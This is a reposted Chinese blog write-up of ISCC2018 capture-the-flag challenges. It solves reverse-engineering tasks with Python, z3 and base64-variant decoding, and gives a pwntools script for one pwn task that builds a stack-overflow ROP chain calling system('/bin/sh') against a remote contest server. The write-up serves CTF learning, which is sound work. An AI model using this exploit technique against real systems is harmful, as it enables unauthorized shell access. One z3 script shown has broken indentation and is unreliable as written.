ISCC2018 Reverse & Pwn writeup

最新推荐文章于 2023-09-27 20:25:04 发布
最新推荐文章于 2023-09-27 20:25:04 发布
阅读量647 收藏
点赞数
文章标签: python
原文链接:http://www.cnblogs.com/ZHijack/p/9105259.html
版权

Reference:L1B0

Re

RSA256

春秋欢乐赛原题。。flag都不变的
给了三个加密文件和公钥证书public.key,可以使用openssl进行处理 

$openssl rsa -pubin -text -modulus -in ./public.key
Public-Key: (256 bit)
Modulus:
    00:d9:9e:95:22:96:a6:d9:60:df:c2:50:4a:ba:54:
    5b:94:42:d6:0a:7b:9e:93:0a:ff:45:1c:78:ec:55:
    d5:55:eb
Exponent: 65537 (0x10001)
Modulus=D99E952296A6D960DFC2504ABA545B9442D60A7B9E930AFF451C78EC55D555EB
writing RSA key
-----BEGIN PUBLIC KEY-----
MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhANmelSKWptlg38JQSrpUW5RC1gp7npMK
/0UceOxV1VXrAgMBAAE=
-----END PUBLIC KEY-----

 

rsa参数中, Exponent=65537 即为 e 值 ,Modulus即为n
使用python解密即可 

#!/usr/bin/env python
#coding:utf-8   
import gmpy2   
import rsa   
p = 302825536744096741518546212761194311477   
q = 325045504186436346209877301320131277983   
n = 98432079271513130981267919056149161631892822707167177858831841699521774310891   
e = 65537   
d = int(gmpy2.invert(e , (p-1) * (q-1)))   
privatekey = rsa.PrivateKey(n , e , d , p , q)        
with open("encrypted.message1" , "rb") as f:   
    print(rsa.decrypt(f.read(), privatekey).decode())         
    with open("encrypted.message2" , "rb") as f:   
        print(rsa.decrypt(f.read(), privatekey).decode())          
        with open("encrypted.message3" , "rb") as f:   
            print(rsa.decrypt(f.read(), privatekey).decode())

 

结果

leftleftrightright

一个upx加壳的exe程序
脱壳后,能够在ida中发现疑似经过换位的flag:s_imsaplw_e_siishtnt{g_ialt}F
按照英文单词猜测,还是有一定几率能猜出正确的flag的。
程序去壳之后就不能运行了,根据学长指示,可以在winedbg中进行调试。但是系统自带的老版本wine会遇到很多错误,所以编译安装wine3.8

编译安装wine3.8

下载源码到用户目录
$tar Jxf wine-3.8.tar.xz
$cd wine-3.8/
$./configure --enable-win64
遇到一个错误error: no suitable bison found. Please install the 'bison' package.
$sudo apt-get install bison
又一个错误error: FreeType 64-bit development files not found. Fonts will not be built.
根据提示判断是和字体相关的包,试了几次一直处错误,索性暂时不安了影响应该不大
$./configure --enable-win64 --without-freetype
$make $sudo make install

wine好像还有点问题,日后再说。。。
只要将断点下在比较函数部分,输入和flag等长的字符串,对比换位前后的变化,即可得到flag变化规则,将之前的字符串逆向变换即可得到flag 借用M4x大佬的图和代码说明 

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'    

encrypt = "s_imsaplw_e_siishtnt{g_ialt}F"    
before = "abcdefghijklmnopqrstuvwxyzABC"
after = "onpqmlrskjtuihvwgfxyedzAcbBCa"    
flag = [encrypt[after.find(c)] for c in before]

print "".join(flag)

#Flag{this_was_simple_isnt_it}

 

My math is bad

解方程类的题目,使用z3比较容易解决
详见z3学习档案

 

obfuscation and encode

程序逻辑可以说乱透了。。
输入的flag经过fencode和encode两个函数进行加密之后与lUFBuT7hADvItXEGn7KgTEjqw8U5VQUq进行比较。
经过分析,encode部分是进行了三位变四位的操作
Result为最终比较结果,trans为flag经过fencode处理得到的串

Reault[0] = alpha[trans[0] >> 2 & 0x3f]  == 'l'
v11 = 1
v10 = 2
Reault[1] = alpha[((trans[1]>>4)|16*trans[0]) & 0x3f] == 'U'
Reault[2] = alpha[((trans[2]>>6)|4*trans[1]) & 0x3f] == 'F'
v12 = 3
v24 = 4
Reault[3] = alpha[trans[2]&0x3f] == 'B'

 

可以根据这一规律进行每四位进行爆破,trans
这是类base64,一般是更改替换表和偏移位数进行编码,所以可以通过改写base64标准解码代码,实现一步到位

这是改写的爱测试国赛的代码。

# -*- coding: UTF-8 -*-
table = 'FeVYKw6a0lDIOsnZQ5EAf2MvjS1GUiLWPTtH4JqRgu3dbC8hrcNo9/mxzpXBky7+'

def decodeBase64(src):
    delPaddingTail = {0: 0, 2: 4, 1: 2}
    value = ''
    n = src.count('=')
    sin = src[:len(src) - n]
    for c in sin:
        value += bin(table.find(c))[2:].zfill(6).replace('0b', '')
    value = value[:len(value) - delPaddingTail[n]]
    print value
    middle = []
    for i in range(8, len(value) + 1, 8):
        middle.append(int(value[i-8:i], 2))
    output = middle
    print output
    return ''.join(map(chr, output)) 

res = decodeBase64("lUFBuT7hADvItXEGn7KgTEjqw8U5VQUq")
print res

 

得到trans

[37, 192, 59, 166, 31, 175, 76, 165, 203, 139, 164, 155, 59, 225, 40, 133, 38, 38, 22, 231, 17, 9, 7, 38]

 

然后,我是通过暴力运行性加代码分析解决的fencode
写gdb脚本的方法倒是不错,程序汇编的0x4008c6和0x400906两行和生成trans有关

在调试的时候只要查看这两句就能看到操作数,其余的地方不用管
也能看到对24位flag,分成6组,每四位和m数组的对应位相乘求和再%127得到trans,同样可以使用z3进行求解。

#!/usr/bin/env python
# -*-coding=utf-8-*-
from z3 import *

trans = [37, 192, 59, 166, 31, 175, 76, 165, 203, 139, 164, 155, 59, 225, 40, 133, 38, 38, 22, 231, 17, 9, 7, 38]
print len(trans)
m = [2,2,4,-5,1,1,3,-3, -1, -2, -3, 4, -1, 0, -2,2]
a = BitVec('a',64)
b = BitVec('b',64)
c = BitVec('c',64)
d = BitVec('d',64)

for i in range(6):
    s = Solver()
    s.add((2 * a + 2 * b + 4 * c - 5 * d) & 0xff== trans[4 * i])
s.add((a + b + 3 * c - 3 * d)& 0xff== trans[4*i+1])
s.add((-1 * a - 2 * b -3 * c + 4 * d) & 0xff == trans[4 * i + 2])
s.add(( -1 * a  - 2 * c + 2 * d) & 0xff == trans[4 * i + 3])
s.add(a<256)
s.add(b<256)
s.add(c<256)
s.add(d<256)
if s.check() == sat:
    print s.model()
else :
    print s.check()

#[b = 108, a = 102, c = 97, d = 103]
#[b = 100, a = 123, c = 79, d = 95]
#[b = 48, a = 121, c = 85, d = 95]
#[b = 78, a = 75, c = 111, d = 87]
#[b = 48, a = 95, c = 73, d = 108]
#[b = 109, a = 86, c = 63, d = 125]

f = [102,108,97,103,123,100,79,95,121,48,85,95,75,78,111,87,95,48,73,108,86,109,63,125]
print map(chr,f)
flag = ''
for i in f:
    flag += chr(i)
print flag

可以得到六组解,排好顺序转字符即可

Pwn

Login(pwn50)

思路

1.没有canary和PIE,在输入choice时存在栈溢出.并且有system函数。
2.账号密码在常字符串,且可以使用全局变量”cmd”存储写入字符串,可以在已知地址内存中输入”/bin/sh”
3.在程序中找到了pop rdi; ret,可以通过控制寄存器传参,溢出后调用system函数。

脚本
#!/usr/bin/env python
# -*-coding=utf-8-*-
from pwn import *
context.log_level = 'debug'    
# io = process('./pwn50')
io = remote('47.104.16.75',9000)
elf = ELF('./pwn50')

sys_addr = elf.plt['system']
rdi_ret = 0x400b03 
cmd = 0x601100
usr = 'admin'
psd = 'T6OBSh2i'

io.recvuntil('name: ')
io.sendline(usr)
io.recvuntil('word: ')
io.sendline(psd)

io.recvuntil('choice: ')
io.send('1\n')
io.recvuntil('and: ')
io.send('/bin/sh\0\n')
io.recvuntil('choice: ')

payload = '3' * (0x50 + 0x8)
payload += p64(rdi_ret) + p64(cmd)
payload += p64(sys_addr)
io.send(payload)
io.interactive()
# flag{welcome_to_iscc}

 

Write some paper(pwn3)

double free 的问题
参见Fastbin之double free

Happy hotel(pwn300)

LCTF原题?House of spirit
Hos分析)
以Pwnable spirited_away为例分析。

 

 

 

 

 

 

 

 

 

 


作者:辣鸡小谱尼
出处:http://www.cnblogs.com/ZHijack/
如有转载,荣幸之至!请随手标明出处;

转载于:https://www.cnblogs.com/ZHijack/p/9105259.html

aoque9909
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ISCC218--Write Some Paper(入门第一题)
FZ070104的博客
12-06 521
检查可执行文件的保护机制 发现PIE没有开启,Canary found和NX enable开启,栈溢出利用难度大,优先考虑堆利用。 静态分析代码 delete_paper在free后没有将指针置空。 在代码我中没有发现溢出点,考虑的double free。 感谢https://blog.csdn.net/qq_29343201/article/details/72627537理论指导 利用...
iscc2016 pwn部分writeup
05-25 358
一.pwn1 简单的32位栈溢出,定位溢出点后即可写exp gdb-peda$ r Starting program: /usr/iscc/pwn1 C'mon pwn me : AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAg...
ISCC reverse writeup-301
qq_33517546的博客
05-12 1156
拿到这个文件的时候,看了下东西,并没有什么exe什么的后缀,就丢到kali看下reverse: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=cbe
ISCC2018线下赛河南赛区的一道Reversewriteup
iqiqiya的博客
08-20 1165
0x01:先运行一下 发现GetFlag按钮是灰色的  输入无反应 直接用灰色按钮克星激活(spy++也行)   点击后出现假的flag(当时还傻傻提交好多次。。。) 0x02:PEiD查壳  发现无壳  VC编译的程序   0x03:既然没有加壳 直接IDA载入分析   shift+F12看看有没有可疑字符串 双击Flag进入    双击向上的箭头(是一个引用...
全国大学生信息安全竞赛writeup--珍贵资料(reverse200)
jmp esp
07-10 6948
描述你无意间得到了一些珍贵资料,可惜他们看起来不知道是什么,据说解开它可以得到flag神器。 tips:flag是flag{结果}附件描述:文件名:珍贵资料.zip校验(SHA1):4EF84DF5B34C12DED8EC3F603CFBC065251864B4思路一个压缩文件,打开解压得到unknown和unknown2,unknown2是一个apk,unknown不知道是啥。安装apk得到一个登
ISCC2015 Writeup REVERSE - Q7.docx
09-30
逆向工程挑战 ISCC2015 Writeup REVERSE - Q7.docx 本文档总结了 ISCC2015 Writeup REVERSE - Q7.docx 中的逆向工程挑战题目,涉及到多种逆向工程技术和算法,包括 DLL 文件分析、APK 文件修复、DES 解密、AES 解密...
ISCC2015 Writeup BASIC - Q7.docx
09-30
ISCC2015 Writeup BASIC - Q7.docx
2014ISCC Writeup
07-19
2014年ISCC全部题目和部分Writeup
ISCC2022题目附件
06-06
2022ISCC所有题目附件,包含ISCC2022-练武题附件和ISCC2022-擂台题附件 信息安全已涉及到国家政治、经济、文化、社会和生态文明的建设,信息系统越发展到它的高级阶段,人们对其依赖性就越强,从某种程度上讲其越...
ISCC2015 Writeup MISC - Q7.docx
09-30
ISCC2015 Writeup MISC - Q7.docx
buuctf习题pwn(41~50)
最新发布
yw__y的博客
09-27 295
堆的题还没写
Ubuntu16.04安装常用软件
foochane
01-19 246
1.QQ的安装 1.1先安装wine sudo apt-get install wine 问题: E: 下载 http://ppa.launchpad.net/tualatrix/ppa/ubuntu/pool/main/f/fonts-android/fonts-droid_4.4.4r2-6ubuntu1_all.deb 404 Not Fou...
iscc reverse
九层台
05-28 867
0x01dig_dig_dig __int64 __fastcall main(int a1, char **a2, char **a3) { size_t v3; // rax char *dest; // ST18_8 size_t v5; // rax __int64 v6; // rax __int64 v7; // rax char *v8; // ST18_8 ...
ISCC 2019 reverse 简单Python(这个pyc有点东西)
qq_42777804的博客
05-17 1267
还是下载解压 打开发现pyc格式,我们直接在网上找在线反编译python的网站: https://tool.lu/pyc/ 反编译后 得到 分析算法:首先输入一段字符串,进入encode函数之后与字符串correct进行比较 encode函数就是将输入的字符串中每个字符ascii都与32进行异或运算,然后每个在加上16得到新的字符串,最后再将这个字符 串进行base64加密。...
CTF-I春秋第二届春秋欢乐赛-CRYPTO-RSA256
weixin_43880435的博客
06-01 927
#CTF 试题 地址:https://www.ichunqiu.com/battalion?t=1&r=611072下载后有四个文件 3、text打开public.key -----BEGIN PUBLIC KEY----- MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhANmelSKWptlg38JQSrpUW5RC1gp7npMK /0UceOxV1VXrAgMBAA...
ISCC2021-REVERSE_Garden -WP
qq_42667177的博客
05-25 954
1、下载附件后是一个.pyc的文件,很明显这是python的编译文件,拿到在线反编译的网站上进行反编译即可得到源码。这里给出反编译网站及源码。 import platform import sys import marshal import types def check(s): f = '2(88\x006\x1a\x10\x10\x1aIKIJ+\x1a\x10\x10\x1a\x06' if len(s) != len(f): return False .
UNCTF2022PwnReverse的部分题解(其他方向的签到题也有)
weixin_73290593的博客
11-21 1171
unctf的re和pwn部分题解
rsa public key not find_RSA攻击解析(不断完善)
weixin_39620197的博客
11-26 703
RSA基本知识这里我只列出几个核心点:两把钥匙公钥:(n, e) //用于加密密钥:(n, d) //用于解密构造过程随机生成了一些非常非常大的整数,并用Miller-Rabin算法检测它们是不是质数,直到找到两个大质数—— 和 。计算两个质数的乘积 计算 //Phi(n)=(P-1)*(Q-1)构造一个比1大、比φ(n)小、不等于 或 的整数e。求出e对于φ(n)的乘法逆元d,也就...
iscc2015官方writeup
09-06
iscc2015是国际信号与通信会议(International Symposium on Communication and Information Technologies)的官方writeup,在这个writeup中,主要回顾了iscc2015会议的主要内容和成果。 iscc2015会议是由IEEE...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值